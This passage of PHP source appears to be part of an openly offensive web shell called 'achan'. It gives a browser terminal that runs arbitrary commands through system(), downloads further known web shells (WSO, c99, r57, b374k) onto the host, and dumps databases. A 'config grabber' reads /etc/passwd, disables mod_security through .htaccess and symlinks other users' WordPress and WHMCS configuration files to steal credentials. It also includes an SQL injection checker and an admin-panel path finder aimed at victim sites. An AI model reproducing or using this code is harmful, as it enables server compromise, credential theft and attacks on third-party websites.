602<p>Current file: <i>'.$_GET['i'].'/'.$_GET['s'].'</i></p></div>
603';
604
605 $f=$_GET['i'].'/'.$_GET['s'];
606 $file = wordwrap(file_get_contents($f),160,"\n",true);
607 $a= highlight_string($file,true);
608 $old = array("0000BB","000000","FF8000","DD0000", "007700");
609 $new = array("f00","000", "333333", "f000e1" , "FF8000");
610 $a= str_ireplace($old,$new, $a);
611 $result = $a;
612
613 echo'
614 <pre class="w3-codespan">'.$result.'</pre>';
615}elseif ($_GET['a']=='edit') {
616 echo "<div class='w3-center w3-container'>
617 <h3 class='w3-indigo w3-text-white w3-text-shadow'>Edit file</h3>
618 <form method='post'>
619 <center><table><tr><td>
620 save as :</td><td><input type='text' name='namabaru' value='".$_GET['s']."' class='w3-input w3-animate-input' style='width:200px'></td><td><input type='submit' value='>>' class='w3-btn w3-indigo' name='sbmt'></td></tr></table>
621 <textarea class='w3-codespan' style='width:100%;height:600px;' name='txta'>".htmlspecialchars(file_get_contents($_GET['i']."/".$_GET['s']))."</textarea>
622 </form></div>";
623}
624if(isset($_POST['sbmt'])){
625 $fp=fopen($_GET['i']."/".$_POST['namabaru'],'w');
626 if(fwrite($fp,$_POST['txta'])){
627 refpage("?i=".$_GET['i']);
628 }else{
629 refpage("?i=".$_GET['i']);
630 }
631 fclose($fp);
632}elseif ($_GET['a']=='download') {
633 ob_clean();
634 $dunlut = $_GET['i']."/".$_GET['s'];
635 header('Content-Description: File Transfer');
636 header('Content-Type: application/octet-stream');
637 header('Content-Disposition: attachment; filename="'.basename($dunlut).'"');
638 header('Expires: 0');
639 header('Cache-Control: must-revalidate');
640 header('Pragma: public');
641 header('Content-Length: ' . filesize($dunlut));
642 readfile($dunlut);
643 exit;
644}elseif ($_GET['a']=='chmod') {
645 echo "<div class='w3-container w3-center'>
646 <h3 class='w3-indigo w3-text-white w3-text-shadow'>Change Permission</h3>
647 <table><tr><td>
648 new Permission :</td><td><input type='number' name='perms' value='".octdec(fileperms($_GET['i']."/".$_GET['s']))."' class='w3-input w3-animate-input' style='width:200px;'></td><td><input type='submit' value='>>' class='w3-btn w3-indigo'></td></tr></table></form></div>";
649}
650if(isset($_POST['perms'])){
651 if(chmod($_GET['i']."/".$_GET['s'],$_POST['perms'])){
652refpage("?i=".$_GET['i']);
653 }else{
654 refpage("?i=".$_GET['i']);
655 }
656}elseif ($_GET['a']=='tentang') {
657 echo tentang();
658}elseif ($_GET['a']=='shell') {
659
660 echo "
661<h3 class='w3-indigo w3-text-shadow w3-text-white w3-center'> Terminal Command Shell </h3>
662 <form method='post'>
663 <pre class='w3-code w3-indigo w3-text-shadow' style='height:700px;'>achan@".$_SERVER['HTTP_HOST'].":".getcwd()." $<input type='text' name='shell' class='w3-indigo w3-text-shadow' style='width:100%;height:24px;border:0;' value='".$_POST['shell']."'></form><br>";
664 if(isset($_POST['shell'])){
665 system($_POST['shell']);
666 }
667echo "</pre>";
668
669}elseif ($_GET['a']=='cmd') {
670 if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
671 echo "
672<h3 class='w3-indigo w3-text-shadow w3-text-white w3-center'> Command Prompt </h3>
673 <form method='post'>
674 <pre class='w3-code w3-indigo w3-text-shadow' style='height:700px;'>achan > ".getcwd()." ><input type='text' name='cmd' class='w3-indigo w3-text-shadow' style='width:100%;height:24px;border:0;' value='".$_POST['cmd']."'></form><br>";
675 if(isset($_POST['cmd'])){
676 exe($_POST['shell']);
677 }
678 echo "</pre>";
679}else{
680 echo "<div class='w3-panel w3-indigo'><h3>This Just Work in Windows Server.</h3></div>";
681}
682}elseif ($_GET['a']=='phpinfo') {
683 @ob_start();
684 @eval("phpinfo();");
685 $buff = @ob_get_contents();
686 @ob_end_clean();
687 $awal = strpos($buff,"<body>")+6;
688 $akhir = strpos($buff,"</body>");
689 echo "<div class=\"w3-table w3-striped w3-border w3-indigo w3-text-black w3-text-shadow\">".substr($buff,$awal,$akhir-$awal)."</div>";
690}elseif ($_GET['a']=='wso') {
691if(ambilcode($l['wso'],'achan-wso.php')){
692 echo"Request done! <a href='achan-wso.php' target='_blank'>Click Here!</a>";
693 }else{
694 echo"Failed check your connection!";
695 }
696}elseif ($_GET['a']=='injection') {
697if(ambilcode($l['injection'],'achan-1n73ction.php')){
698 echo"Request done! <a href='achan-1n73ction.php' target='_blank'>Click Here!</a>";
699 }else{
700 echo"Failed check your connection!";
701 }
702}elseif ($_GET['a']=='bejak') {
703if(ambilcode($l['bejak'],'achan-b374k.php')){
704 echo"Request done! <a href='achan-b374k.php' target='_blank'>Click Here!</a>";
705 }else{
706 echo"Failed check your connection!";
707 }
708}elseif ($_GET['a']=='idx') {
709 if(ambilcode($l['indoxploit_shell'],'achan-indoxploit.php')){
710 echo"Request done! <a href='achan-indoxploit.php' target='_blank'>Click Here!</a>";
711 }else{
712 echo"Failed check your connection!";
713 }
714}elseif ($_GET['a']=='c') {
715 if(ambilcode($l['c99'],'achan-c99.php')){
716 echo"Request done! <a href='achan-c99.php' target='_blank'>Click Here!</a>";
717 }else{
718 echo"Failed check your connection!";
719 }
720}elseif ($_GET['a']=='r') {
721 if(ambilcode($l['r57'],'achan-r57.php')){
722 echo"Request done! <a href='achan-r57.php' target='_blank'>Click Here!</a>";
723 }else{
724 echo"Failed check your connection!";
725 }
726}elseif ($_GET['a']=='andela') {
727 if(ambilcode($l['andela'],'achan-andela.php')){
728 echo"Request done! <a href='achan-andela.php' target='_blank'>Click Here!</a>";
729 }else{
730 echo"Failed check your connection!";
731 }
732}elseif ($_GET['a']=='sbh') {
733 if(ambilcode($l['sbh'],'achan-sbh.php')){
734 echo"Request done! <a href='achan-sbh.php' target='_blank'>Click Here!</a>";
735 }else{
736 echo"Failed check your connection!";
737 }
738}elseif ($_GET['a']=='bh') {
739 if(ambilcode($l['bh'],'achan-bh.php')){
740 echo"Request done! <a href='achan-bh.php' target='_blank'>Click Here!</a>";
741 }else{
742 echo"Failed check your connection!";
743 }
744}elseif ($_GET['a']=='adminer') {
745if(ambilcode($l['adminer'],'achan-adminer.php')){
746 echo"Request done! <a href='achan-adminer.php' target='_blank'>Click Here!</a>";
747 }else{
748 echo"Failed check your connection!";
749 }
750}elseif ($_GET['a']=='svc') {
751 echo'
752 <div class="w3-center w3-container">
753 <h3 class="w3-indigo w3-text-white w3-text-shadow w3-center">SQL injection vulnerable checker</h3>
754 <form method="post" >
755 <textarea style="width:60%;height:300px;" placeholder="http://korban.co.li/anu.php?id=1" name="korban" class="w3-indigo w3-codespan" style="width:500px;height:250px;border:0;"></textarea><br>
756 <input type="submit" name="submit" value="Check!" class="w3-btn w3-indigo w3-hover-white">
757</form>
758<br>';
759if(isset($_POST['submit'])){
760$ko=$_POST['korban'];
761
762$pisah=explode("\n",$ko);
763echo "<hr>
764<table class='w3-table w3-striped w3-border'><thead class='w3-black'><th>No.</th><th>Website</th><th>Status</th></thead>";
765$no=1;
766foreach ($pisah as $ah) {
767 $dapatkan=file_get_contents($ah."'");
768 if(preg_match('/SQL syntax;|You Have Error|Warning|mysql_fetch_array|mysql_fetch_assoc|mysql_num_rows/',$dapatkan)){
769 echo "<tr class='w3-green w3-hover-white'><td>".$no++."</td><td><b>".$ah."</b></td><td>[<i>vulnerable</i>]</td></tr>";
770 }else{
771 echo "<tr class='w3-indigo w3-hover-white'><td>".$no++."</td><td><b>".$ah."</b></td><td>[<i>not vulnerable</i>]</td></tr>";
772 }
773}
774}
775echo "</table></div>";
776}elseif ($_GET['a']=='dbdump') {
777 echo '
778 <div class="w3-center w3-container">
779 <h3 class="w3-indigo w3-text-white w3-text-shadow w3-center">Database dumper</h3>
780 <form method="post" >
781<table class="w3-table w3-striped w3-border">
782<tr>
783 <td>Hostname </td>
784 <td><input type="text" name="server" class="w3-input w3-animate-input" style="width:200px"></td></tr><tr>
785 <td>Username</td>
786 <td><input type="text" name="username" class="w3-input w3-animate-input" style="width:200px"></td></tr><tr>
787 <td>Password</td>
788 <td><input type="text" name="password" class="w3-input w3-animate-input" style="width:200px"></td></tr><tr>
789 <td>DataBase</td>
790 <td><input type="text" name="dbname" class="w3-input w3-animate-input" style="width:200px"></td></tr>
791 <tr>
792 <td>DB Type </td>
793 <td>
794 <select name="method" class="w3-input w3-animate-input" style="width:200px">
795 <option value="gzip">Gzip</option>
796 <option value="sql">Sql</option>
797 </select>
798 <input name="btnx" type="submit" value="Dump" class="w3-btn w3-indigo w3-hover-white"></td></tr>
799 </form></center></table>
800
801 </div>';
802if (isset($_POST['btnx'])){
803$date = date("Y-m-d");
804$dbserver = $_POST['server'];
805$dbuser = $_POST['username'];
806$dbpass = $_POST['password'];
807$dbname = $_POST['dbname'];
808$file = "achan-$dbname-$date";
809$method = $_POST['method'];
810if ($method=='sql'){
811$file="achan-$dbname-$date.sql";
812$fp=fopen($file,"w");
813}else{
814$file="achan-$dbname-$date.sql.gz";
815$fp = gzopen($file,"w");
816}
817function write($data) {
818global $fp;
819if ($_POST['method']=='ssql'){
820fwrite($fp,$data);
821}else{
822gzwrite($fp, $data);
823}}
824mysql_connect ($dbserver, $dbuser, $dbpass);
825mysql_select_db($dbname);
826$tables = mysql_query ("SHOW TABLES");
827while ($i = mysql_fetch_array($tables)) {
828 $i = $i['Tables_in_'.$dbname];
829 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
830 write($create['Create Table'].";\n\n");
831 $sql = mysql_query ("SELECT * FROM ".$i);
832 if (mysql_num_rows($sql)) {
833 while ($row = mysql_fetch_row($sql)) {
834 foreach ($row as $j => $k) {
835 $row[$j] = "'".mysql_escape_string($k)."'";
836 }
837 write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
838 }
839 }
840}
841if ($method=='ssql'){
842fclose ($fp);
843}else{
844gzclose($fp);}
845header("Content-Disposition: attachment; filename=" . $file);
846header("Content-Type: application/download");
847header("Content-Length: " . filesize($file));
848flush();
849
850$fp = fopen($file, "r");
851while (!feof($fp))
852{
853 echo fread($fp, 65536);
854 flush();
855}
856fclose($fp);
857
858}
859}elseif ($_GET['a']=='mkdir') {
860 echo "
861 <div class='w3-container w3-center'>
862 <h3 class='w3-indigo w3-text-white w3-text-shadow'>Mass Make Directory</h3>
863<form method='post'>
864<textarea class='w3-indigo w3-code' style='border:0;width:700px;height:280px;' name='mkdir'>newdir\nnewdir2</textarea><br>
865<input type='submit' class='w3-btn w3-indigo w3-hover-white' value='make dir'>
866</form>
867</div>
868 ";
869if(isset($_POST['mkdir'])){
870 $dir=$_POST['mkdir'];
871 $mdir=explode("\n",$dir);
872 foreach ($mdir as $ndir) {
873 mkdir($_GET['i']."/".$ndir,0777);
874 }
875 echo "<script>
876 window.location.href='?i=".$_GET['i']."';
877 </script>";
878}
879}elseif ($_GET['a']=='mkfile') {
880
881 echo "
882 <div class='w3-container w3-center'>
883 <h3 class='w3-indigo w3-text-white w3-text-shadow'>Make File</h3>
884<form method='post'>
885<table><tr><td>Save as:</td><td><input type='text' name='letakf' class='w3-input w3-animate-input' style='width:280px;' value='".$d."/achan-newfile.php'></td><td><input type='submit' class='w3-btn w3-indigo w3-hover-white' value='make file' name='subfile'></td></tr></table>
886<textarea class='w3-indigo w3-code' style='border:0;width:100%;height:500px;' name='mkfile'><?php\necho'sometext';\n?></textarea><br>
887</form>
888</div>";
889if(isset($_POST['subfile'])){
890 $xp=fopen($_POST['letakf'],"w");
891 if(fwrite($xp,$_POST['mkfile'])){
892 echo "<script>
893 alert('file created!');
894 </script>";
895 }else{
896 echo "<script>
897 alert('failed to create file');
898 </script>";
899 }
900 fclose($xp);
901}
902}elseif ($_GET['a']=='hi') {
903 if(isset($_POST['gethash'])){
904 $hash = $_POST['hash'];
905 if(strlen($hash)==32){
906 $hashresult = "MD5 Hash";
907 }elseif(strlen($hash)==40){
908 $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
909 }elseif(strlen($hash)==13){
910 $hashresult = "DES(Unix) Hash";
911 }elseif(strlen($hash)==16){
912 $hashresult = "MySQL Hash / /DES(Oracle Hash)";
913 }elseif(strlen($hash)==41){
914 $GetHashChar = substr($hash, 40);
915 if($GetHashChar == "*"){
916 $hashresult = "MySQL5 Hash";
917 }
918 }elseif(strlen($hash)==64){
919 $hashresult = "SHA-256 Hash";
920 }elseif(strlen($hash)==96){
921 $hashresult = "SHA-384 Hash";
922 }elseif(strlen($hash)==128){
923 $hashresult = "SHA-512 Hash";
924 }elseif(strlen($hash)==34){
925 if(strstr($hash, '$1$')){
926 $hashresult = "MD5(Unix) Hash";
927 }
928 }elseif(strlen($hash)==37){
929 if(strstr($hash, '$apr1$')){
930 $hashresult = "MD5(APR) Hash";
931 }
932 }elseif(strlen($hash)==34){
933 if(strstr($hash, '$H$')){
934 $hashresult = "MD5(phpBB3) Hash";
935 }
936 }elseif(strlen($hash)==34){
937 if(strstr($hash, '$P$')){
938 $hashresult = "MD5(Wordpress) Hash";
939 }
940 }elseif(strlen($hash)==39){
941 if(strstr($hash, '$5$')){
942 $hashresult = "SHA-256(Unix) Hash";
943 }
944 }elseif(strlen($hash)==39){
945 if(strstr($hash, '$6$')){
946 $hashresult = "SHA-512(Unix) Hash";
947 }
948 }elseif(strlen($hash)==24){
949 if(strstr($hash, '==')){
950 $hashresult = "MD5(Base-64) Hash";
951 }
952 }else{
953 $hashresult = "Hash type not found";
954 }
955 }else{
956 $hashresult = "Not Hash Enteindigo";
957 }
958
959 echo'
960 <div class="w3-container w3-center">
961 <h3 class="w3-indigo w3-text-white w3-text-shadow"> Hash Identification </h3>
962
963 <form method="POST">
964 <table class="w3-table w3-striped">
965 <tr><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" class="w3-input w3-animate-input" style="width:200px"/></td><td><input type="submit" name="gethash" value="Identify Hash" class="w3-btn w3-indigo"/></td></tr>
966 <tr><b><td>Result</td><td>:</td><td colspan=2>'.$hashresult.'</td></tr></b>
967 </table></tr></form>
968 </div>';
969}elseif ($_GET['a']=='ph') {
970 $submit= $_POST['enter'];
971if (isset($submit)) {
972$pass = $_POST['password'];
973$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN';
974$hash = md5($pass);
975$md4 = hash("md4",$pass);
976$hash_md5 = md5($salt.$pass);
977$hash_md5_double = md5(sha1($salt.$pass));
978$hash1 = sha1($pass);
979$sha256 = hash("sha256",$text);
980$hash1_sha1 = sha1($salt.$pass);
981$hash1_sha1_double = sha1(md5($salt.$pass));
982}
983echo '
984<div class="w3-container w3-center">
985<h3 class="w3-indigo w3-text-shadow w3-text-white"> Password Hash </h3>
986<form method="post">
987<table class="w3-table w3-striped">
988<tr><td>Input string :</td>
989<td><input type="text" name="password" class="w3-input w3-animate-input" style="width:280px" /></td><td>
990<input type="submit" name="enter" value="hash" class="w3-btn w3-indigo"/>
991</td></tr>
992<tr class="w3-indigo"><th colspan="3">Hasil Hash</th></center></tr>
993<tr><td>Original Password</td><td colspan="2"><input type="text" value="'.$pass.'" class="w3-input w3-animate-input" style="width:280px"></td></tr>
994<tr><td>MD5</td><td colspan="2"><input type="text" class="w3-input w3-animate-input" style="width:280px" value="'.$hash.'"></td></tr>
995<tr><td>MD4</td><td colspan="2"><input type="text" class="w3-input w3-animate-input" style="width:280px" value="'.$md4.'"></td></tr>
996<tr><td>MD5 with Salt</td><td colspan="2"><input type="text" class="w3-input w3-animate-input" style="width:280px" value="'.$hash_md5.'"></td></tr>
997<tr><td>MD5 with Salt & Sha1</td><td colspan="2"><input type="text" class="w3-input w3-animate-input" style="width:280px" value="'.$hash_md5_double.'"></td></tr>
998<tr><td>Sha1</td><td colspan="2"><input type="text" class="w3-input w3-animate-input" style="width:280px" value="'.$hash1.'"></td></tr>
999<tr><td>Sha256</td><td colspan="2"><input type="text" class="w3-input w3-animate-input" style="width:280px" value="'.$sha256.'"></td></tr>
1000<tr><td>Sha1 with Salt</td><td colspan="2"><input type="text" class="w3-input w3-animate-input" style="width:280px" value="'.$hash1_sha1.'"></td></tr>
1001<tr><td>Sha1 with Salt & MD5</td><td colspan="2"><input type="text" class="w3-input w3-animate-input" style="width:280px" value="'.$hash1_sha1_double.'"></td></tr></table></div>';
1002}elseif ($_GET['a']=='ed') {
1003 echo'<div class="w3-center w3-container">
1004 <h3 class="w3-indigo w3-text-shadow w3-text-white"> Enc0de & Dec0de + Conventer </h3>
1005 <br>
1006<form method="post">
1007<textarea name="e" style="width:77%;height:300px" placeholder="input string here [!]" class="w3-indigo">
1008</textarea><br><br>
1009<center>
1010 <select name="opt" style="width:70%" class="w3-input w3-center">
1011 <optgroup label="Converter">
1012 <option value="dechex">Decimal to Hexa</option> <option value="hexdec">Hexa to Decimal</option>
1013<option value="decoct">Decimal to Octa</option>
1014<option value="octdec">Octa to Decimal</option>
1015 <option value="decbin">Decimal to Binary</option>
1016 <option value="bindec">Binary to Decimal</option>
1017 <option value="hexbin">Hexa to Binary</option>
1018<option value="binhex">Binary to Hexa</option>
1019</optgroup><optgroup label="encode&decode">
1020 <option value="url">URL</option> <option value="base64">base64</option>
1021<option value="urlbase64">URL - base64</option>
1022<option value="cuu">Convert_uu</option>
1023<option value="sgzcuus64">str_rot13 - gzinflate - convert_uu - str_rot13 - base64 </option>
1024<option value="gz64">gzinflate - base64</option>
1025 <option value="sgz64">str_rot13 - gzinflate - base64</option>
1026 <option value="s64">str_rot13 - gzinflate - str_rot13 - base64</option>
1027<option value="sb64">str_rot13 - base64 </option>
1028 <option value="64url">URL - base64</option>
1029<option value="64u64u">URL - base64 - url - base64</option>
1030<option value="ss64"> base64 - str_rot13 - str_rot13</option>
1031</optgroup>
1032 </select>
1033 <br>
1034<input type="submit" value="Convert!" name="c" class="w3-btn w3-indigo w3-hover-white">
1035<input type="submit" value="enc0de" name="en" class="w3-btn w3-blue w3-hover-white">
1036<input type="submit" value="dec0de" name="de" class="w3-btn w3-yellow w3-hover-white">
1037</form>
1038
1039 ';
1040 $a = $_POST['e'];
1041 $o = $_POST['opt'];
1042 if(isset($_POST['c'])){
1043 switch($o){
1044 case'dechex';
1045 $s= dechex($a);
1046 break;
1047 case'dechex';
1048 $s= hexdec($a);
1049 break;
1050 case'decoct';
1051 $s= decoct($a);
1052 break;
1053 case'octdec';
1054 $s= octdec($a);
1055 break;
1056 case'decbin';
1057 $s= decbin($a);
1058 break;
1059 case'bindec';
1060 $s= bindec($a);
1061 break;
1062 case'hexbin';
1063 $s= hex2bin($a);
1064 break;
1065 case'binhex';
1066 $s= bin2hex($a);
1067 break;
1068 }
1069echo'<br>:: OutPut ::<br><textarea style="width:77%;height:300px " class="w3-indigo">'.$s.'</textarea>';
1070 }elseif(isset($_POST['en'])){
1071 switch($o){
1072 case'url';
1073 $r=urlencode($a);
1074 break;
1075 case'base64';
1076 $r=base64_encode($a);
1077 break;
1078 case'urlbase64';
1079 $r=urlencode(base64_encode($a));
1080 break;
1081 case'gz64';
1082 $r=base64_encode(gzdeflate($a));
1083
1084 break;
1085 case'sgz64';
1086 $r=base64_encode(gzdeflate(str_rot13($a)));
1087 break;
1088 case's64';
1089 $r=(base64_encode(str_rot13(gzdeflate(str_rot13($a)))));
1090 break;
1091 case'sb64';
1092 $r=base64_encode(str_rot13($a));
1093 break;
1094 case'64url';
1095 $r=base64_encode(urlencode($a));
1096 break;
1097 case'64u64u';
1098 $r=base64_encode(urlencode(base64_encode(urlencode($a))));
1099 break;
1100 case'cuu';
1101 $r=convert_uuencode($a);
1102 break;
1103 case'sgzcuus64';
1104 $r=base64_encode(str_rot13(convert_uuencode(gzdeflate(str_rot13($a)))));
1105 break;
1106 case'ss64';
1107 $r=str_rot13(str_rot13(base64_encode($a)));
1108 break;
1109 }
1110 echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" class="w3-indigo">'.$r.'</textarea>';
1111
1112 }
1113//Dec0de
1114 if(isset($_POST['de'])){
1115 switch($o){
1116 case'url';
1117 $r=urldecode($a);
1118 break;
1119 case'base64';
1120 $r=base64_decode($a);
1121 break;
1122 case'urlbase64';
1123 $r=base64_decode(urldecode($a));
1124 break;
1125 case'gz64';
1126 $r=gzinflate(base64_decode($a));
1127
1128 break;
1129 case'sgz64';
1130 $r=str_rot13(gzinflate(base64_decode($a)));
1131 break;
1132 case's64';
1133 $r=str_rot13(gzinflate(str_rot13(base64_decode($a))));
1134 break;
1135 case'sb64';
1136 $r=str_rot13(base64_decode($a));
1137 break;
1138 case'64url';
1139 $r=urldecode(base64_decode($a));
1140 break;
1141 case'64u64u';
1142 $r=urldecode(base64_decode(urldecode(base64_decode($a))));
1143 break;
1144 case'cuu';
1145 $r=convert_uudecode($a);
1146 break;
1147 case'sgzcuus64';
1148 $r=str_rot13(gzinflate(convert_uudecode(str_rot13(base64_decode($a)))));
1149 break;
1150 case'ss64';
1151 $r=base64_decode(str_rot13(str_rot13($a)));
1152 }
1153 $rx = htmlspecialchars($r);
1154 echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" class="w3-indigo">'.$rx.'</textarea>';
1155 }
1156}elseif ($_GET['a']=='rs') {
1157 echo"
1158 <div class='w3-container w3-center'>
1159 <h3 class='w3-indigo w3-text-shadow w3-text-white'> auto replace string </h3>
1160 <br>
1161 <form method='post'>
1162 <table class='w3-table w3-border'>
1163 <tr><td colspan=2><input type='submit' name='sstr' value='replace all' style='width:100%;' class='w3-btn w3-btn-block w3-indigo'></td></tr>
1164 <tr><td>
1165 <textarea name='str' style='width:600px;height:200px;' class='w3-indigo'>Your string here</textarea></td><td>
1166 <textarea name='str2' style='width:600px;height:200px;' class='w3-blue'>string will u replace</textarea></td></tr>
1167 <tr><td>
1168 <textarea name='str3' style='width:600px;height:200px;' class='w3-yellow'>string replace</textarea></td><td>
1169 <form>";
1170 if(isset($_POST['sstr'])){
1171 $rep=str_replace($_POST['str2'],$_POST['str3'],$_POST['str']);
1172 if($rep){
1173 echo'
1174 <textarea style="width:600px;height:200px;" class="w3-green">'.htmlspecialchars($rep).'</textarea>';
1175 }
1176 }
1177 echo "</td></tr></table>";
1178}elseif ($_GET['a']=='logout') {
1179 session_destroy();
1180 echo "<script>
1181 alert('Bye!');
1182 window.location.href='?login.php';
1183 </script>";
1184}elseif ($_GET['a']=='achan') {
1185 echo tentangAchan();
1186}elseif ($_GET['a']=='jkt48') {
1187 echo tentangJKT48();
1188}elseif ($_GET['a']=='cg') {
1189 if(!file("/etc/passwd")){ $etcpasswd="/etc/passwd gak bisa di akses!";}else{ $etcpasswd= file_get_contents('/etc/passwd');}
1190 echo'<div class="w3-container w3-center"><h3 class="w3-indigo w3-text-white w3-text-shadow">Config Grabber</h3>';
1191 echo'<form method=post><center><textarea name="user" class="w3-code w3-indigo" style="width:100%;height:500px">'.$etcpasswd.'</textarea><br><br><input type="submit" name="su" value="Gotcha e\'m all!" class="w3-btn w3-indigo"></form></center>';
1192
1193if(isset($_POST['su']))
1194 {
1195 mkdir('config_grab',0777);
1196 $r = " \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>";
1197$f = fopen('config_grab/.htaccess','w');
1198fwrite($f,$r);
1199echo "<br><center><b><i><a href='config_grab'>TOUCH ME SENPAI</a></i></b></center>";
1200$usr=explode("\n",$_POST['user']);
1201foreach($usr as $uss)
1202{
1203 $us=trim($uss);
1204$r="config_grab/";
1205symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
1206symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wp-config');
1207symlink('/home/'.$us.'/public_html/blog/configuration.php',$r.$us.'..joomla');symlink('/home/'.$us.'/public_html/wp/wp-config.php',$r.$us.'..wp-config');
1208symlink('/home/'.$us.'/public_html/wordpress/wp-congig.php',$r.$us.'..wordpress');symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
1209symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
1210symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
1211symlink('/home/'.$us.'/public_html/secure/configuration.php',$r.$us.'..securewhmcs');
1212symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-clients');
1213symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-client');
1214symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-billing');
1215symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-config');
1216}
1217echo'<center>berhasil!! <a href="config_grab" target="_blank">touch me senpai..</a></center>';
1218}
1219}elseif ($_GET['a']=='af') {
1220echo'<div class="w3-container w3-center"><h3 class="w3-indigo w3-text-shadow w3-text-white">Admin finder</h3>';
1221echo'<form method="POST" action="">site : <input type="text" name="url" style="width:260px" value="http://" class="w3-input w3-animate-input" style="width:300px;"><input type="submit" name="submit" value="find[!]" class="w3-btn w3-indigo" /><br><br>';
1222function xss_protect($data, $strip_tags = false, $allowed_tags = "") {
1223 if($strip_tags) {
1224 $data = strip_tags($data, $allowed_tags . "<b>");
1225 }
1226
1227 if(stripos($data, "script") !== false) {
1228 $result = str_replace("script","scr<b></b>ipt", htmlentities($data, ENT_QUOTES));
1229 } else {
1230 $result = htmlentities($data, ENT_QUOTES);
1231 }
1232
1233 return $result;
1234}
1235function urlExist($url)
1236{
1237 $handle = curl_init($url);
1238 if (false === $handle)
1239 {
1240 return false;
1241 }
1242 curl_setopt($handle, CURLOPT_HEADER, false);
1243 curl_setopt($handle, CURLOPT_FAILONERROR, true);
1244 curl_setopt($handle, CURLOPT_HTTPHEADER, Array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15") ); // request as if Firefox
1245 curl_setopt($handle, CURLOPT_NOBODY, true);
1246 curl_setopt($handle, CURLOPT_RETURNTRANSFER, false);
1247 $connectable = curl_exec($handle);
1248 curl_close($handle);
1249 return $connectable;
1250}
1251 if(isset($_POST['submit']) && isset($_POST['url']))
1252 {
1253 $url= htmlentities(xss_protect($_POST['url']));
1254 if(filter_var($url, FILTER_VALIDATE_URL))
1255 {
1256 $trying = array(':2082',':2083','a_admins/','admin/','adminweb/','po-admin','index.php?q=admin','administrator/','admin/admin.php','cpanel','admin3/','admin4/','admin5/','usuarios/',
1257 'usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/',
1258 'panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php',
1259 'admin/index.php','admin/login.php','admin/admin.php','admin/account.php','admin_area/admin.php',
1260 'admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html',
1261 'admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php',
1262 'bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admin.php',
1263 'admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
1264 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html',
1265 'panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php',
1266 'nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php',
1267 'administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
1268 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html',
1269 'login.php','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php',
1270 'pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
1271 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php',
1272 'adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php',
1273 'admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
1274 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html',
1275 'login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html',
1276 'panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html',
1277 'adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
1278 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php',
1279 'adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php',
1280 'panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php',
1281 'adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
1282 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','admin.asp','admin/admin.asp',
1283 'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp',
1284 'bb-admin/admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','user.asp','webadmin/index.asp',
